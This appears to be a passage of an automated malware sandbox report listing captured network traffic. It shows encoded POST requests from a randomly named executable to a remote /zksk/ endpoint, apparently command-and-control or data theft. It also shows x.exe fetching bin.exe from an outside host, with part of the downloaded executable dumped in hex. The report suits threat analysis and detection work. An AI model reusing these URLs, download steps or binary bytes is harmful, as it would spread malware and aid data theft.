                                                    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_oczZobKLtdrdoLIypZ3JJE9lhQSCWf0XHdNaLNMIaOKpySVIWUgrfKtQ85wpky3GL1nCaPhoMNRA7L3teKi0GQ==
                                                    set-cookie: parking_session=3d8430e7-eceb-419d-8cbb-c166a23fb2c9; expires=Wed, 11 Sep 2024 14:01:05 GMT; path=/
                                                    connection: close
                                                    Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 6f 63 7a 5a 6f 62 4b 4c 74 64 72 64 6f 4c 49 79 70 5a 33 4a 4a 45 39 6c 68 51 53 43 57 66 30 58 48 64 4e 61 4c 4e 4d 49 61 4f 4b 70 79 53 56 49 57 55 67 72 66 4b 74 51 38 35 77 70 6b 79 33 47 4c 31 6e 43 61 50 68 6f 4d 4e 52 41 37 4c 33 74 65 4b 69 30 47 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                    Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_oczZobKLtdrdoLIypZ3JJE9lhQSCWf0XHdNaLNMIaOKpySVIWUgrfKtQ85wpky3GL1nCaPhoMNRA7L3teKi0GQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                    Sep 11, 2024 15:46:05.086668015 CEST583INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                    Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiM2Q4NDMwZTctZWNlYi00MTlkLThjYmItYzE2NmEyM2ZiMmM5IiwicGFnZV90aW1lIjoxNzI2MDYyMz


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    34192.168.2.849750199.59.243.226803260C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 11, 2024 15:46:07.169382095 CEST642OUTPOST /zksk/ HTTP/1.1
                                                    Host: www.pmjjewels.online
                                                    Accept: */*
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-us
                                                    Origin: http://www.pmjjewels.online
                                                    Cache-Control: max-age=0
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 229
                                                    Connection: close
                                                    Referer: http://www.pmjjewels.online/zksk/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:41.0) Gecko/20100101 Firefox/41.0
                                                    Data Raw: 37 46 68 70 68 50 78 38 3d 63 61 70 67 6c 4c 78 6c 37 7a 34 49 56 6f 67 56 6c 51 68 6a 46 62 74 65 4f 77 68 32 6a 43 71 57 70 75 2f 69 75 59 4b 4b 54 77 70 2b 48 71 55 2b 79 4b 72 76 6a 69 6e 4f 53 33 41 31 69 39 67 2b 56 58 72 69 79 32 64 2b 56 64 61 70 68 61 53 62 77 47 65 33 6d 62 67 6b 6e 44 39 62 78 30 2f 35 6d 6f 74 37 56 72 68 43 6e 59 66 35 46 35 6c 58 71 33 39 4a 44 53 39 33 63 30 2f 6e 4e 69 51 76 46 63 6c 41 39 74 47 4d 6c 33 4a 54 39 39 50 57 47 4a 4a 79 55 4d 4a 68 56 43 61 72 49 30 38 31 35 50 4f 63 53 33 35 56 48 74 6d 53 49 6d 50 57 30 64 77 36 78 6e 2b 4f 6d 54 62 49 71 54 4d 2b 64 72 4a 42 4a 31 48 50 54 6d 36 46 41 33 47 4e 35 34 45 58 47 6c 41 62 71 4c 38 4a
                                                    Data Ascii: 7FhphPx8=capglLxl7z4IVogVlQhjFbteOwh2jCqWpu/iuYKKTwp+HqU+yKrvjinOS3A1i9g+VXriy2d+VdaphaSbwGe3mbgknD9bx0/5mot7VrhCnYf5F5lXq39JDS93c0/nNiQvFclA9tGMl3JT99PWGJJyUMJhVCarI0815POcS35VHtmSImPW0dw6xn+OmTbIqTM+drJBJ1HPTm6FA3GN54EXGlAbqL8J
                                                    Sep 11, 2024 15:46:07.614717007 CEST1236INHTTP/1.1 200 OK
                                                    date: Wed, 11 Sep 2024 13:46:06 GMT
                                                    content-type: text/html; charset=utf-8
                                                    content-length: 1130
                                                    x-request-id: e29d9534-b481-4c0e-ba6a-df7e4f57182f
                                                    cache-control: no-store, max-age=0
                                                    accept-ch: sec-ch-prefers-color-scheme
                                                    critical-ch: sec-ch-prefers-color-scheme
                                                    vary: sec-ch-prefers-color-scheme
                                                    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_oczZobKLtdrdoLIypZ3JJE9lhQSCWf0XHdNaLNMIaOKpySVIWUgrfKtQ85wpky3GL1nCaPhoMNRA7L3teKi0GQ==
                                                    set-cookie: parking_session=e29d9534-b481-4c0e-ba6a-df7e4f57182f; expires=Wed, 11 Sep 2024 14:01:07 GMT; path=/
                                                    connection: close
                                                    Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 6f 63 7a 5a 6f 62 4b 4c 74 64 72 64 6f 4c 49 79 70 5a 33 4a 4a 45 39 6c 68 51 53 43 57 66 30 58 48 64 4e 61 4c 4e 4d 49 61 4f 4b 70 79 53 56 49 57 55 67 72 66 4b 74 51 38 35 77 70 6b 79 33 47 4c 31 6e 43 61 50 68 6f 4d 4e 52 41 37 4c 33 74 65 4b 69 30 47 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                    Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_oczZobKLtdrdoLIypZ3JJE9lhQSCWf0XHdNaLNMIaOKpySVIWUgrfKtQ85wpky3GL1nCaPhoMNRA7L3teKi0GQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                    Sep 11, 2024 15:46:07.614772081 CEST583INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                    Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZTI5ZDk1MzQtYjQ4MS00YzBlLWJhNmEtZGY3ZTRmNTcxODJmIiwicGFnZV90aW1lIjoxNzI2MDYyMz


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    35192.168.2.849751199.59.243.226803260C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 11, 2024 15:46:09.712253094 CEST1659OUTPOST /zksk/ HTTP/1.1
                                                    Host: www.pmjjewels.online
                                                    Accept: */*
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-us
                                                    Origin: http://www.pmjjewels.online
                                                    Cache-Control: max-age=0
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 1245
                                                    Connection: close
                                                    Referer: http://www.pmjjewels.online/zksk/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:41.0) Gecko/20100101 Firefox/41.0
                                                    Data Raw: 37 46 68 70 68 50 78 38 3d 63 61 70 67 6c 4c 78 6c 37 7a 34 49 56 6f 67 56 6c 51 68 6a 46 62 74 65 4f 77 68 32 6a 43 71 57 70 75 2f 69 75 59 4b 4b 54 77 68 2b 47 59 63 2b 77 74 33 76 69 69 6e 4f 4a 33 41 34 69 39 67 47 56 57 44 63 79 33 68 75 56 66 53 70 7a 6f 61 62 32 33 65 33 78 72 67 6b 76 6a 39 67 2f 55 2f 57 6d 6f 39 42 56 6f 5a 43 6e 59 66 35 46 38 68 58 2b 32 39 4a 42 53 39 30 4c 45 2f 37 61 53 51 4c 46 63 4d 39 39 74 4b 63 6c 48 70 54 36 64 2f 57 56 63 64 79 59 4d 4a 6e 47 79 61 34 49 30 77 71 35 50 69 6d 53 33 4e 7a 48 74 4f 53 5a 51 79 38 6f 2b 4d 52 31 6b 62 78 75 51 58 6b 76 42 34 46 55 6f 74 41 55 31 72 70 63 43 2b 54 44 31 53 6e 78 50 4e 6d 54 69 45 41 74 76 56 47 38 69 65 34 47 6d 65 54 78 77 56 57 39 70 6b 62 59 32 74 46 69 53 58 33 31 33 34 76 2b 62 6b 4d 37 4a 58 73 39 37 44 4f 39 75 75 63 61 46 34 51 53 38 47 48 6b 4f 37 49 38 4d 4a 39 37 68 54 49 6e 4e 64 48 68 57 63 71 57 41 62 32 2f 4e 50 58 62 39 62 54 57 6d 2b 79 77 6d 4a 51 74 5a 54 6b 6a 65 78 52 77 76 75 75 53 35 2f 44 61 [TRUNCATED]
                                                    Data Ascii: 7FhphPx8=capglLxl7z4IVogVlQhjFbteOwh2jCqWpu/iuYKKTwh+GYc+wt3viinOJ3A4i9gGVWDcy3huVfSpzoab23e3xrgkvj9g/U/Wmo9BVoZCnYf5F8hX+29JBS90LE/7aSQLFcM99tKclHpT6d/WVcdyYMJnGya4I0wq5PimS3NzHtOSZQy8o+MR1kbxuQXkvB4FUotAU1rpcC+TD1SnxPNmTiEAtvVG8ie4GmeTxwVW9pkbY2tFiSX3134v+bkM7JXs97DO9uucaF4QS8GHkO7I8MJ97hTInNdHhWcqWAb2/NPXb9bTWm+ywmJQtZTkjexRwvuuS5/DaO5iEPcAu2rjgduaTsZBbyeb/uIVd4z6b2wT2Pn7ou1j/R/u2+Rf3eHV0TONvnMem8LALQQYiO1N1fTju44GHi+Y5cBmf994pSzOk4YZYJzMWOBtlGtnrTnCYQZ8zk5CB5ugfYQ0J2uTdewsHVkb5d+VbIRYPgPpgtrLeJ3or6NHetiMD6GRAGvPAhIkFmVHY2HyIW+h1JV+r+VgMdFPfjW4lDnZMWHtvI3r9OnT3gTdbMdkbQSVkIcYd2Je7bx1WgIoKmVZWRYdG6Gy1ikC3jssd50bcLi0RLNSAYGFklLgJ99+/q5CIEAnIgTx+2E0Kh5uVvqjfK0iwZnXihDoCb5zYP3hibrK3DfGhIStzd97KPfSmyRkJX0b6dy3Q69W2hzTf1gw+tf4Pyep52eprfj6Q9d9t+uwwXmTJYpTYMWtnuU8w+AN2xsW4p+gnqOaLthOe4nA91ymmU1I6Snw1UX+4c05dsNG9WySh0cUp2o5Sq4NBNelrzuhQZ44U7Jg1r4XheK9RZJokpyLqyvsPLqsfy13NO5FE3CVksbKiO6TMEW/+DgOiSdtmXSTYGQ5AxM6I++IDsi+eBctCs9KVFkIdGsOOnL4btc4doLHWE9Z2iaUPXjr/m61dnkOlYe2Im5bPZPTrDDqH3IXGJ28VuxbtzdfJJkLPCV [TRUNCATED]
                                                    Sep 11, 2024 15:46:10.186181068 CEST1236INHTTP/1.1 200 OK
                                                    date: Wed, 11 Sep 2024 13:46:10 GMT
                                                    content-type: text/html; charset=utf-8
                                                    content-length: 1130
                                                    x-request-id: d2da571c-16d5-4686-ba43-b014093372f3
                                                    cache-control: no-store, max-age=0
                                                    accept-ch: sec-ch-prefers-color-scheme
                                                    critical-ch: sec-ch-prefers-color-scheme
                                                    vary: sec-ch-prefers-color-scheme
                                                    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_oczZobKLtdrdoLIypZ3JJE9lhQSCWf0XHdNaLNMIaOKpySVIWUgrfKtQ85wpky3GL1nCaPhoMNRA7L3teKi0GQ==
                                                    set-cookie: parking_session=d2da571c-16d5-4686-ba43-b014093372f3; expires=Wed, 11 Sep 2024 14:01:10 GMT; path=/
                                                    connection: close
                                                    Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 6f 63 7a 5a 6f 62 4b 4c 74 64 72 64 6f 4c 49 79 70 5a 33 4a 4a 45 39 6c 68 51 53 43 57 66 30 58 48 64 4e 61 4c 4e 4d 49 61 4f 4b 70 79 53 56 49 57 55 67 72 66 4b 74 51 38 35 77 70 6b 79 33 47 4c 31 6e 43 61 50 68 6f 4d 4e 52 41 37 4c 33 74 65 4b 69 30 47 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                    Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_oczZobKLtdrdoLIypZ3JJE9lhQSCWf0XHdNaLNMIaOKpySVIWUgrfKtQ85wpky3GL1nCaPhoMNRA7L3teKi0GQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                    Sep 11, 2024 15:46:10.186433077 CEST583INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                    Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZDJkYTU3MWMtMTZkNS00Njg2LWJhNDMtYjAxNDA5MzM3MmYzIiwicGFnZV90aW1lIjoxNzI2MDYyMz


                                                    HTTPS Proxied Packets

                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    0192.168.2.84970689.42.218.724436364C:\Users\user\Desktop\x.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-09-11 13:43:05 UTC68OUTGET /we/bin.exe HTTP/1.1
                                                    Host: epsys.ro
                                                    Connection: Keep-Alive
                                                    2024-09-11 13:43:06 UTC292INHTTP/1.1 200 OK
                                                    Connection: close
                                                    content-type: application/x-msdownload
                                                    last-modified: Wed, 11 Sep 2024 02:12:18 GMT
                                                    accept-ranges: bytes
                                                    content-length: 286720
                                                    date: Wed, 11 Sep 2024 13:43:04 GMT
                                                    server: LiteSpeed
                                                    x-xss-protection: 1; mode=block
                                                    x-content-type-options: nosniff
                                                    2024-09-11 13:43:06 UTC16384INData Raw: 4d 5a 45 52 e8 00 00 00 00 58 83 e8 09 8b c8 83 c0 3c 8b 00 03 c1 83 c0 28 03 08 ff e1 90 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 79 01 09 a0 3d 60 67 f3 3d 60 67 f3 3d 60 67 f3 1a a6 a8 f3 3a 60 67 f3 1a a6 aa f3 3c 60 67 f3 1a a6 ab f3 3c 60 67 f3 52 69 63 68 3d 60 67 f3 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 01 00 e5 76 da 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 4e 04 00 00 00 00 00 00 00 00 00 00 15 00 00 00 10 00 00 00 60 04 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00
                                                    Data Ascii: MZERX<(!L!This program cannot be run in DOS mode.$y=`g=`g=`g:`g<`g<`gRich=`gPELv`N`@
                                                    2024-09-11 13:43:06 UTC16384INData Raw: 3e a6 e9 4e cf d1 95 90 be ba 13 f0 29 15 83 12 77 69 55 c2 3a 23 90 21 a7 f9 12 f6 db 60 76 a3 b0 fa ff 0c bf a8 c7 97 20 ea fa 4d fa c8 8f d5 17 41 f2 11 92 83 36 47 92 eb f7 27 02 12 f5 45 8d 4a 43 5f 34 93 db 0f 92 d2 e0 47 eb 18 59 71 22 6a 44 c4 f1 58 d7 2c f2 9e 9c d2 d0 0f 8a 47 b6 d4 a3 9b 83 3e b5 db 49 5f 30 fa b2 60 29 b1 68 94 14 5c e4 bb a7 21 9a e0 01 c7 f0 79 fe 51 cc f0 28 69 8e 38 fd 73 17 09 ab 0b c0 08 9e fc 13 23 e7 38 58 ae 47 54 42 7e dc 41 72 e2 47 92 bd bf 0f 71 5e 2b 7f ac 11 27 2c 3b 51 4b da 1a 89 83 a3 5c 7d ad 87 a4 4d 78 e7 e8 0d 3f 85 81 87 32 58 2e 80 9c 81 88 cd 36 bf de f6 35 38 cb e0 2f 8d 00 a2 56 50 0e 70 b2 92 65 bb f5 aa ee 5f 4e 61 f1 0b fc 2b 5e 73 63 23 43 db 70 14 41 df ac d4 b6 0c 22 37 d7 18 06 83 5c 14 94 5c
                                                    Data Ascii: >N)wiU:#!`v MA6G'EJC_4GYq"jDX,G>I_0`)h\!yQ(i8s#8XGTB~ArGq^+',;QK\}Mx?2X.658/VPpe_Na+^sc#CpA"7\\
                                                    2024-09-11 13:43:06 UTC16384INData Raw: 94 26 c3 2e 3c d2 3c 93 16 2e 28 01 56 3a d3 06 2d de e1 72 20 22 90 54 e0 d0 26 13 d9 3d 87 48 5e ef c7 ac 2b db ee 36 7a ae 85 84 98 84 42 a3 7d fa 27 bd c5 2e 2e 2b 48 4d 95 12 9d a9 2e 2a f6 64 46 18 57 d8 6b 7d 2e 56 ea eb 63 b2 ad b2 d3 d1 cc 08 c3 5f 4c 21 56 43 8d 21 1b c4 d1 ad 1e ee 24 b2 45 61 f5 1f 6d 50 be af f7 8d c5 a5 8e 25 d7 96 e3 5c d8 5c 94 96 9a 7f f6 65 34 40 44 ef 57 26 0b f0 73 78 ad d4 c7 f4 d3 3d 68 2b a7 b8 86 8e 61 c1 ae 9b a7 13 2a 59 4b f6 19 20 c5 21 98 f0 44 b3 8f 52 a8 61 e7 27 39 f9 69 19 d9 d4 86 24 4d 58 7a f5 be 8b 2b a1 41 e7 9d 10 b3 44 ed ee 9f 86 d6 d6 1a f0 65 93 9e fd be ab 77 4f 9b 53 87 43 a4 ee f4 56 e6 e1 30 cd 7e ed a4 ea a0 3e a4 e0 9b 67 90 f9 ff f6 f6 63 15 18 bd bc be e7 3f 69 1f 1e e3 54 a1 28 e2 6e 8e
                                                    Data Ascii: &.<<.(V:-r "T&=H^+6zB}'..+HM.*dFWk}.Vc_L!VC!$EamP%\\e4@DW&sx=h+a*YK !DRa'9i$MXz+ADewOSCV0~>gc?iT(n
                                                    2024-09-11 13:43:06 UTC16384INData Raw: 21 d8 02 8c 7c 2a 22 42 d2 c2 3f cc 82 ec a4 6c 1b bb aa 48 54 da 9d ad 88 6e c7 ee f7 66 f2 ed cf 79 63 2e c8 71 ab 78 38 a4 b7 5e 44 c7 fb 29 b1 6c 76 ee 6f 27 8f 9d 5f 3d 47 2b 3d 88 8c 94 17 8f 0e 49 24 41 7d f7 d5 c8 c9 c0 38 a7 b8 ed 5f 03 a4 5c 37 05 fd 9a c5 33 82 f5 c9 51 00 1c 8b c1 ed 95 f7 aa d4 ec 26 09 aa 3e 15 14 df 51 3c 67 53 4a ce e1 93 ea 95 65 e7 e7 42 9c c7 99 f5 e4 25 06 6f ba a0 35 7f 1c d1 c4 f9 0d 38 73 97 45 67 fe 38 7d 20 6a a9 e7 88 0d aa 03 76 a1 1e 58 32 ff 09 ac 7a 3e 45 9d fc 19 bf b8 5b 6d ab da b5 1a fc 02 9a 0a ee 96 35 5c bd d7 8a c2 38 6f 1f 1d 33 86 77 ff 3b f3 e3 45 7e ed 08 5b ae 3c 41 e6 91 96 69 01 f4 5f 92 7f 52 51 16 be d8 52 31 2f 26 e6 63 8c 69 94 c9 b9 34 85 ee 81 d7 5e a8 28 51 cc c0 1b 9f c9 60 9e 22 3d 66
                                                    Data Ascii: !|*"B?lHTnfyc.qx8^D)lvo'_=G+=I$A}8_\73Q&>Q<gSJeB%o58sEg8} jvX2z>E[m5\8o3w;E~[<Ai_RQR1/&ci4^(Q`"=f
                                                    2024-09-11 13:43:06 UTC16384INData Raw: 4d da 7b f3 a5 b3 ef 00 62 4a 81 57 03 62 eb f3 37 59 39 5b cb 73 15 58 2c 06 b9 89 16 33 f4 3d b6 f0 a7 e2 85 d9 f0 30 10 1d f5 3c e3 66 11 af fc 8e 53 9e 42 9f 24 6b 02 78 af 7d 92 88 f3 06 70 0a 96 0f a9 11 b1 11 28 61 1e fd 32 40 68 11 32 bc ac 8a 4d ca cc dc a6 b1 1d a3 23 2c 65 9f 20 dc 06 bc 37 e6 8a ff 06 dc 7c 6d 2e ff 09 79 a4 ec 8a f2 95 7e 16 87 80 78 c3 b0 39 cf b0 df e8 f4 cf 22 c9 53 b6 9a 4a ee 55 45 78 43 20 c3 3f 87 de 24 68 cd 47 0e 2d 4a 70 91 3f 5a 2e 0f e0 70 f0 fc 96 18 45 22 19 ce b3 75 8d 04 19 ae 10 8d c7 c1 71 c0 64 91 f9 81 be 86 a7 03 ba ef 47 83 4e 9e b4 ca f4 08 0d ec da c1 db b0 40 85 bb ce 28 3f 64 ed dc 64 89 b9 4e 95 f5 0f 43 4a 4f 56 c9 13 28 73 5d 1f d0 0a 25 7e ae 96 06 56 f3 e7 b0 9a 35 f0 85 5e 88 be 02 ce 7e 77 ed
                                                    Data Ascii: M{bJWb7Y9[sX,3=0<fSB$kx}p(a2@h2M#,e 7|m.y~x9"SJUExC ?$hG-Jp?Z.pE"uqdGN@(?ddNCJOV(s]%~V5^~w
                                                    2024-09-11 13:43:06 UTC16384INData Raw: 96 75 7d ea a4 85 60 3a ef e9 7b d3 67 a6 a5 2d 28 95 0d c4 c8 95 35 49 50 d4 a5 32 ff 2c 81 e7 63 70 e4 fa ba b6 d2 57 1b d7 70 b1 bb fe fc cc 97 90 d2 a7 52 18 a5 78 c4 33 17 2f 9d 9c c9 75 64 05 13 7f 50 7d 30 b6 02 56 1a 3d 9d c8 95 a7 22 98 8a 2f e1 6e cc 8d 78 53 22 0f 08 61 71 ac 7b bc 24 03 75 84 cc fc a8 9c ab 52 87 b8 e7 e8 2b 0b 83 69 3d 5f 00 ac 43 b9 0d cb a7 57 9f e2 55 ea a7 2f b8 f1 31 f8 72 99 cb 80 06 2b 6e 3e ac 8d 1b 95 b1 38 72 4b 5e fe f1 27 6c cf 70 c9 2b 23 73 11 0e 95 9f a6 6c 62 3c c7 75 03 fe fb e0 27 4f 63 99 77 a6 f8 5d 15 c1 a9 22 d7 52 fc 13 2c 1d 7c 4a a6 55 86 0f c0 52 f3 69 f7 34 25 48 0d 9e b7 31 0e 9c 85 95 eb aa f0 ce cc 23 8a 35 27 3a fa a6 c7 50 3f 48 31 ce 73 1e 20 4c 5f 28 c8 44 fe 3c 6c ff f7 73 8d 7e ba 94 7e 4d
                                                    Data Ascii: u}`:{g-(5IP2,cpWpRx3/udP}0V="/nxS"aq{$uR+i=_CWU/1r+n>8rK^'lp+#slb<u'Ocw]"R,|JURi4%H1#5':P?H1s L_(D<ls~~M
                                                    2024-09-11 13:43:06 UTC16384INData Raw: b0 12 30 dc d9 ce 01 02 64 35 2b 5f c1 0c 37 fd 75 86 8d 1a da 48 47 19 e8 cf 27 01 ce 27 c0 15 12 72 fc f7 ec f2 36 6e af d6 e7 88 2b 4a ed b7 00 17 d7 65 51 7a 27 53 03 d5 00 1e 87 35 da ef a0 23 0b db ed 65 a8 71 7b a6 69 43 75 be 77 f6 82 b4 ff 44 3b e1 50 b7 90 6f cd d3 da 82 c3 f0 66 79 3f f1 2a 75 b5 71 36 1f eb e7 45 96 6e fb b2 b7 92 f6 64 78 d4 2b 27 9e 9d af 47 b7 41 44 24 56 cf 1f b9 42 a9 8e eb 14 e9 20 15 c1 50 84 00 e5 40 8b e6 2f 7f ad c8 20 79 c2 7b 31 3f 66 94 03 33 38 64 68 34 54 80 96 bc 2f 53 f1 c3 a0 23 18 d4 47 97 85 31 c5 37 44 2c d4 5c bb 60 f4 f1 5c e4 3e 9e 81 50 fa 57 3c 0d 28 25 de 87 b2 6b b1 1a a6 c2 0d 7a f8 66 68 d1 3c fc 5f a2 a6 08 94 9c db 61 b4 72 b0 6a af a6 7f 30 4b 62 51 0e 43 0b b1 7a ad 87 20 a1 aa 93 bb 20 72 f9
